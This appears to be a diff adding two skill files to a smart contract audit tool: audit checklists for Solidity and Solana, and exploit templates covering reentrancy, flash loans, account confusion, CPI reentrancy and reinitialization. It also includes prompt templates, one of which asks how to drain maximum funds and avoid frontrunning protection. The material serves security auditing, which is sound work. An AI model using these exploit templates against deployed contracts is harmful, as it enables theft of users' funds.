audit-system 2.0.0

package/skills/auditor.md

@@ -0,0 +1,280 @@
+# Smart Contract Auditor Skill
+
+## Role
+Senior Smart Contract Security Auditor with deep expertise in:
+- **EVM/Solidity:** Solidity, DeFi exploit mechanics, Foundry
+- **Solana/Rust:** Anchor, Sealevel, SPL, CPI, PDA, Borsh
+- **ink!/Polkadot:** Substrate, ink! smart contracts, FRAME
+
+## Objective
+Systematically analyze smart contracts, identify vulnerabilities, rank severity, and generate actionable findings with reproducible PoC.
+
+---
+
+## Workflow
+
+```
+1. Parse contract → identify all functions, modifiers, state variables
+2. Map attack surface → external calls, state transitions, access points
+3. Cross-reference knowledge base → match patterns from vault
+4. Generate attack hypotheses → beyond known patterns
+5. Apply novel discovery → break assumptions, find novel vectors
+6. Create PoC tests → Foundry format
+7. Rank findings by severity
+8. Write audit report
+```
+
+---
+
+## Analysis Checklist
+
+### Access Control
+- [ ] All sensitive functions have proper modifiers (onlyOwner, roles)
+- [ ] Constructor sets ownership correctly
+- [ ] No public functions that should be internal
+- [ ] Proxy admin controls are safe
+
+### Reentrancy
+- [ ] CEI pattern followed (Check → Effect → Interact)
+- [ ] ReentrancyGuard used on vulnerable functions
+- [ ] No state updates after external calls
+- [ ] Cross-function reentrancy checked
+
+### Arithmetic
+- [ ] SafeMath or Solidity 0.8+ used
+- [ ] No unchecked blocks with dangerous math
+- [ ] Division before multiplication avoided
+- [ ] Precision loss analyzed
+
+### External Calls
+- [ ] Return values of `.call()` checked
+- [ ] `.transfer()` / `.send()` gas limitations considered
+- [ ] External contract trust assumptions documented
+- [ ] Flash loan vectors identified
+
+### Token Logic
+- [ ] ERC20 return values checked
+- [ ] Fee-on-transfer tokens handled
+- [ ] Rebasing token compatibility verified
+- [ ] Approval race conditions checked
+
+### Oracle & Price
+- [ ] No spot price manipulation possible
+- [ ] TWAP used where needed
+- [ ] Chainlink staleness checks present
+- [ ] Flash loan price manipulation vector closed
+
+### Denial of Service
+- [ ] No unbounded loops
+- [ ] No pull-payment to blocking contracts
+- [ ] Gas limits considered in all loops
+
+### Signature & Replay
+- [ ] Nonces used for replay protection
+- [ ] Chain ID included in signatures
+- [ ] Signature malleability handled
+
+### Logic Bugs
+- [ ] State invariants maintained
+- [ ] Edge cases at boundaries (0, max uint)
+- [ ] Order of operations correct
+- [ ] Initialization protected
+
+---
+
+## Solana/Rust Audit Checklist
+
+### Account Model
+- [ ] All accounts expected by the instruction are checked
+- [ ] Account types are validated (not just Pubkey)
+- [ ] Owner check: `account.owner == program_id` on all program-owned accounts
+- [ ] Signer check: `Signer` or `is_signer` on all sensitive accounts
+- [ ] Writable check: `UncheckedAccount` not used where `AccountInfo` mut required
+- [ ] No account confusion (wrong account passed but same type)
+- [ ] `close` instruction correctly closes accounts (sends rent to correct destination)
+- [ ] Seeds/PDAs derived with correct seeds and bump
+- [ ] `AccountLoader` used correctly for large accounts
+
+### Cross-Program Invocation (CPI)
+- [ ] CPI returns checked and handled
+- [ ] Seeds passed in CPI signed correctly (PDA signing)
+- [ ] Reentrancy via CPI considered (malicious program called back)
+- [ ] No missing `invoke_signed` where PDA signing is needed
+- [ ] CPI to unknown/arbitrary programs restricted
+- [ ] Program ID passed from external input verified against expected
+
+### Borsh Deserialization
+- [ ] Custom `pack`/`unpack` implementations safe (no overflow)
+- [ ] Discriminator checked before deserializing accounts
+- [ ] Account length validated before unpacking
+- [ ] No `unsafe` deserialization without bounds checking
+- [ ] Padding bytes handled correctly
+- [ ] Enum variants validated (no out-of-bounds variant)
+
+### Arithmetic & Numeric
+- [ ] `Overflowing` math avoided or explicitly intended
+- [ ] Safe math via `checked_*`, `overflowing_*`, or `Saturating`/`Wrapping`
+- [ ] Integer division precision loss analyzed
+- [ ] Signed integer usage reviewed for unexpected behavior
+- [ ] Multiplication before division to preserve precision
+
+### PDA & Seeds
+- [ ] PDA seeds deterministic and unique
+- [ ] No two users can derive same PDA
+- [ ] Bump seed canonical (highest valid bump)
+- [ ] Seeded accounts not confused with user-provided accounts
+- [ ] `find_program_address` vs `create_program_address` used correctly
+
+### Signer & Authorization
+- [ ] All authority checks performed before state mutations
+- [ ] Delegation checks correct (SPL token `delegated_amount`)
+- [ ] `set_authority` instructions protected
+- [ ] Multi-signature setups validated
+- [ ] Owner/authority checks on SPL token accounts
+
+### Token Operations (SPL)
+- [ ] Token account ownership verified
+- [ ] Mint authority checks present
+- [ ] Close token accounts use correct destination
+- [ ] Associated token accounts (ATA) derived correctly
+- [ ] Token decimals handled consistently
+
+### Clock & Time
+- [ ] `Clock::get()` slot/timestamp assumptions documented
+- [ No reliance on exact block timestamps
+- [ ] Slot number used instead of timestamp where possible
+- [ ] Time-dependent logic bounded
+- [ ] No assumption about transaction ordering within slot
+
+### Unsafe Rust
+- [ ] `unsafe` blocks reviewed for memory safety
+- [ ] Raw pointer arithmetic avoided
+- [ ] `std::mem::transmute` usage verified
+- [ ] Union types safe
+- [ ] No undefined behavior (UB) reachable via crafted input
+
+### Close Account
+- [ ] Account data zeroed out or discriminator changed before close
+- [ ] Rent correctly claimed by closed account owner
+- [ ] No use-after-close (account recreated via same address)
+- [ ] Reinitialization attack prevented
+
+### Rent & Economics
+- [ ] Rent exemption checked
+- [ ] Lamport transfers reviewed for overflow
+- [ ] No lamport draining from program-owned accounts
+- [ ] Rent calculations correct
+
+---
+
+## Novel Discovery Step
+
+After completing the standard checklist, apply the Novel Discovery framework to find unknown vulnerability classes:
+
+### When to Apply
+- Complex protocols with novel mechanisms
+- High-value contracts (treasury, governance)
+- When standard audit finds nothing but risk remains
+- During bug bounty triage
+
+### Process
+1. **Map Assumptions** — Document all implicit developer assumptions
+2. **Break Assumptions** — Generate attack hypotheses for each assumption
+3. **Economic Model** — Treat protocol as game, find attacker Nash equilibria
+4. **State Machine** — Find invalid state transitions
+5. **Composition Attack** — Test feature interactions
+6. **Generate Hypotheses** — Synthesize concrete, testable attack vectors
+
+### Reference
+See [[novel-discovery]] for complete framework, specialized prompts, and usage instructions.
+
+---
+
+## Severity Framework
+
+| Severity | Criteria | Example |
+|---|---|---|
+| CRITICAL | Direct fund loss, full protocol compromise | Reentrancy draining vault |
+| HIGH | Significant fund loss, broken invariant | Access control bypass |
+| MEDIUM | Partial loss, degraded functionality | Oracle manipulation |
+| LOW | Minor issue, best practice violation | Missing event emission |
+| INFO | Gas optimization, code quality | Unused variable |
+
+---
+
+## Output Format
+
+For each finding:
+
+```
+## [SEVERITY] Title
+
+**Location:** Contract.sol :: functionName() :: line N
+
+**Description:**
+Clear explanation of the vulnerability.
+
+**Root Cause:**
+Technical reason why this exists.
+
+**Impact:**
+What an attacker can achieve and economic damage.
+
+**Attack Vector:**
+Step-by-step attack path.
+
+**PoC (Foundry):**
+\`\`\`solidity
+function test_exploit() public {
+    // setup
+    // attack
+    // assert damage
+}
+\`\`\`
+
+**Recommendation:**
+Concrete fix with code example.
+```
+
+---
+
+## Prompts to Use with Claude
+
+### Full Audit
+```
+You are a Senior Smart Contract Security Auditor.
+Analyze the following Solidity contract using this checklist: [paste checklist].
+For each vulnerability found:
+1. Classify severity (CRITICAL/HIGH/MEDIUM/LOW/INFO)
+2. Explain root cause
+3. Describe attack vector step by step
+4. Generate Foundry PoC test
+5. Suggest concrete fix
+
+Contract:
+[PASTE CONTRACT]
+```
+
+### Focused Attack
+```
+You are an exploit specialist.
+Given this contract, generate attack hypotheses beyond known patterns.
+Focus on:
+- State transition edge cases
+- Economic attack vectors
+- Interaction between functions
+- Invariant violations
+
+Contract:
+[PASTE CONTRACT]
+```
+
+### PoC Generation
+```
+Generate a complete Foundry test file for this vulnerability:
+- Vulnerability: [DESCRIPTION]
+- Contract: [PASTE CONTRACT]
+- Attack goal: [WHAT ATTACKER WANTS]
+
+Include setup, attack execution, and assertion of success.
+```

package/skills/exploit-generator.md

@@ -0,0 +1,394 @@
+# Exploit Generator Skill
+
+## Role
+Smart Contract Exploit Specialist — transforms vulnerability hypotheses into working PoC tests.
+- **Solidity:** Foundry PoC tests
+- **Rust/Solana:** Anchor TypeScript tests or Rust integration tests
+- **Rust/ink!:** cargo-contract tests
+
+## Objective
+Given a vulnerability description and contract code, generate a complete, reproducible exploit that proves the finding is valid and quantifies impact.
+
+---
+
+## Exploit Generation Framework
+
+### Phase 1 — Understand the Target
+```
+- What is the contract's purpose?
+- What assets does it hold?
+- What invariants must hold?
+- What functions are entry points?
+```
+
+### Phase 2 — Model the Attack
+```
+- Who is the attacker (EOA, contract, flash loan)?
+- What preconditions are needed?
+- What sequence of calls?
+- What is the success condition?
+```
+
+### Phase 3 — Write the PoC
+```
+- Setup: deploy contracts, fund accounts, set initial state
+- Execute: run attack sequence
+- Assert: prove damage or invariant violation
+```
+
+### Phase 4 — Maximize Impact
+```
+- Can the attack be repeated?
+- Can it be scaled?
+- What's the maximum extractable value?
+```
+
+---
+
+## Foundry PoC Templates
+
+### Template 1 — Basic Exploit
+```solidity
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+import "forge-std/Test.sol";
+import "../src/VulnerableContract.sol";
+
+contract ExploitTest is Test {
+    VulnerableContract target;
+    address attacker = makeAddr("attacker");
+    address victim = makeAddr("victim");
+
+    function setUp() public {
+        target = new VulnerableContract();
+        // Fund setup
+        deal(address(target), 100 ether);
+        deal(attacker, 1 ether);
+    }
+
+    function test_exploit() public {
+        uint256 balanceBefore = attacker.balance;
+
+        vm.startPrank(attacker);
+        // Attack logic here
+        vm.stopPrank();
+
+        uint256 balanceAfter = attacker.balance;
+        assertGt(balanceAfter, balanceBefore, "Exploit failed: no profit");
+
+        console.log("Profit:", balanceAfter - balanceBefore);
+    }
+}
+```
+
+### Template 2 — Reentrancy Exploit
+```solidity
+contract ReentrancyAttacker {
+    IVulnerable target;
+    uint256 attackCount;
+
+    constructor(address _target) {
+        target = IVulnerable(_target);
+    }
+
+    function attack() external payable {
+        target.deposit{value: msg.value}();
+        target.withdraw(msg.value);
+    }
+
+    receive() external payable {
+        if (address(target).balance >= msg.value && attackCount < 5) {
+            attackCount++;
+            target.withdraw(msg.value);
+        }
+    }
+}
+```
+
+### Template 3 — Flash Loan Attack
+```solidity
+contract FlashLoanAttacker is IFlashLoanReceiver {
+    ILendingPool pool;
+    IVulnerable target;
+
+    function attack() external {
+        uint256 amount = 1_000_000e18;
+        pool.flashLoan(address(this), amount, "");
+    }
+
+    function executeOperation(uint256 amount, uint256 fee) external {
+        // Use flash loaned funds to manipulate price / state
+        // ...
+
+        // Repay
+        IERC20(token).transfer(address(pool), amount + fee);
+    }
+}
+```
+
+### Template 4 — Access Control Bypass
+```solidity
+function test_accessControlBypass() public {
+    vm.startPrank(attacker);
+
+    // Test if unauthorized call succeeds
+    target.sensitiveFunction();
+
+    // Assert unauthorized action succeeded
+    assertEq(target.owner(), attacker, "Should not be possible");
+
+    vm.stopPrank();
+}
+```
+
+### Template 5 — Oracle Manipulation
+```solidity
+function test_oracleManipulation() public {
+    // 1. Get flash loan
+    // 2. Swap to manipulate spot price
+    // 3. Call vulnerable function that reads spot price
+    // 4. Profit from price discrepancy
+    // 5. Swap back, repay flash loan
+
+    vm.startPrank(attacker);
+
+    uint256 priceBefore = oracle.getPrice();
+    // Manipulate...
+    uint256 priceAfter = oracle.getPrice();
+
+    assertNotEq(priceBefore, priceAfter, "Price not manipulated");
+
+    vm.stopPrank();
+}
+```
+
+---
+
+## Rust/Solana Exploit Templates
+
+Chain: Solana
+Framework: Anchor
+Testing: @coral-xyz/anchor (TypeScript) ou Rust integration tests
+
+### Template 1 — Anchor TypeScript Exploit
+
+```typescript
+import * as anchor from "@coral-xyz/anchor";
+import { Program } from "@coral-xyz/anchor";
+import { TargetProgram } from "../target/types/target_program";
+
+describe("exploit", () => {
+  anchor.setProvider(anchor.AnchorProvider.env());
+  const program = anchor.workspace.TargetProgram as Program<TargetProgram>;
+  const attacker = anchor.web3.Keypair.generate();
+
+  before(async () => {
+    // Airdrop SOL to attacker
+    const sig = await anchor
+      .getProvider()
+      .connection.requestAirdrop(
+        attacker.publicKey,
+        10 * anchor.web3.LAMPORTS_PER_SOL
+      );
+    await anchor
+      .getProvider()
+      .connection.confirmTransaction(sig);
+  });
+
+  it("Executes exploit", async () => {
+    // Setup - create accounts, fund, etc.
+    const victimAccount = anchor.web3.Keypair.generate();
+    // ... setup code ...
+
+    // Get balances before
+    const beforeBalance = await anchor
+      .getProvider()
+      .connection.getBalance(attacker.publicKey);
+
+    // Execute attack sequence
+    const tx = await program.methods
+      .vulnerableFunction(new anchor.BN(100))
+      .accounts({
+        attacker: attacker.publicKey,
+        // ... other accounts ...
+      })
+      .signers([attacker])
+      .rpc();
+
+    // Get balances after
+    const afterBalance = await anchor
+      .getProvider()
+      .connection.getBalance(attacker.publicKey);
+
+    // Assert exploit succeeded
+    console.log("Profit:", (afterBalance - beforeBalance) / anchor.web3.LAMPORTS_PER_SOL, "SOL");
+    expect(afterBalance).toBeGreaterThan(beforeBalance);
+  });
+});
+```
+
+### Template 2 — Account Confusion Exploit (Anchor/TS)
+
+```typescript
+it("Account confusion: swap user A for user B", async () => {
+  // The program expects two accounts: user_a and user_b
+  // User B's account is writable and has funds
+  // Attacker passes user_b as BOTH user_a AND user_b
+
+  const exploitTx = await program.methods
+    .transfer(new anchor.BN(1000))
+    .accounts({
+      userA: victim.publicKey,  // Same account!
+      userB: victim.publicKey,  // Same account!
+      authority: attacker.publicKey,
+    })
+    .signers([attacker])
+    .rpc();
+
+  // Assert: attacker transferred from user B to... user B (no-op bypass!)
+  // Or: attacker withdrew from user B by confusing identity
+});
+```
+
+### Template 3 — CPI Reentrancy Exploit (Rust)
+
+```rust
+// Attacker program that reenters the target during CPI
+use anchor_lang::prelude::*;
+use anchor_lang::solana_program::program::invoke;
+
+declare_id!("AttacK1111111111111111111111111111111111111");
+
+#[program]
+pub mod attacker {
+    use super::*;
+
+    pub fn exploit(ctx: Context<Exploit>) -> Result<()> {
+        // Call target's vulnerable function
+        let target_cpi = ctx.accounts.target_program.to_account_info();
+        let victim = ctx.accounts.victim.to_account_info();
+
+        // CPI into target - target will call us back
+        invoke(
+            &target_vulnerable_ix,
+            &[/* accounts */],
+        )?;
+
+        Ok(())
+    }
+
+    pub fn callback(
+        ctx: Context<Callback>,
+        amount: u64,
+    ) -> Result<()> {
+        // Reenter the target again
+        // Target assumes state is already updated, but it's not!
+        let target_cpi = ctx.accounts.target_program.to_account_info();
+
+        invoke(
+            &target_vulnerable_ix,
+            &[/* accounts */],
+        )?;
+
+        Ok(())
+    }
+}
+```
+
+### Template 4 — Reinitialization Exploit (Anchor/TS)
+
+```typescript
+it("Reinit after close", async () => {
+  // 1. Create a legitimate user account
+  const userAccount = anchor.web3.Keypair.generate();
+  await program.methods
+    .initialize()
+    .accounts({ user: userAccount.publicKey })
+    .signers([userAccount])
+    .rpc();
+
+  // 2. Close the account
+  await program.methods
+    .close()
+    .accounts({ user: userAccount.publicKey })
+    .signers([userAccount])
+    .rpc();
+
+  // 3. Reinitialize the same account (now rent-exempt)
+  // The program doesn't check if already initialized!
+  const attacker = anchor.web3.Keypair.generate();
+  await program.methods
+    .initialize()
+    .accounts({ user: userAccount.publicKey })
+    .signers([userAccount]) // Attacker controls the old keypair!
+    .rpc();
+
+  // 4. Now attacker has access to previous user's privileges
+});
+```
+
+---
+
+## Prompt Templates
+
+### Generate Full PoC (Solidity)
+```
+You are a smart contract exploit specialist.
+
+Vulnerability: [DESCRIPTION]
+Type: [REENTRANCY / ACCESS_CONTROL / ORACLE / ARITHMETIC / LOGIC]
+Contract: [PASTE CONTRACT]
+
+Generate a complete Foundry test that:
+1. Deploys and sets up the contract
+2. Executes the attack
+3. Asserts the exploit succeeded
+4. Logs profit or damage amount
+
+Use realistic amounts. The test must PASS when run with `forge test`.
+```
+
+### Generate Full PoC (Rust/Solana)
+```
+You are a Solana exploit specialist.
+
+Vulnerability: [DESCRIPTION]
+Type: [ACCOUNT_CONFUSION / CPI_REENTRANCY / UNSAFE_RUST / REINIT / SIGNER / PDA]
+Program: [PASTE RUST PROGRAM]
+
+Generate a complete Anchor test (TypeScript or Rust) that:
+1. Sets up accounts with anchor.Provider
+2. Executes the attack sequence
+3. Asserts exploit succeeded
+4. Logs profit or state change
+
+Use realistic SOL amounts. The test must PASS with `anchor test`.
+```
+
+### Maximize Impact
+```
+Given this working exploit:
+[PASTE EXISTING PoC]
+
+Suggest how to:
+1. Scale the attack to drain maximum funds
+2. Make it atomic (single transaction)
+3. Add flash loan to amplify
+4. Avoid frontrunning protection
+```
+
+---
+
+## Common Attack Patterns Quick Reference
+
+| Pattern | Entry Point | Key Function |
+|---|---|---|
+| Reentrancy | withdraw() | receive() / fallback() |
+| Flash Loan | any DEX | executeOperation() |
+| Access Control | admin functions | makeAddr() + prank |
+| Oracle Manip | price-dependent | swap() + query |
+| Integer Overflow | math operations | unchecked {} |
+| Front Running | mempool | vm.roll() + vm.prank() |
+| Signature Replay | permit/sign | reuse signature |
+| Self-Destruct | selfdestruct | force ETH send |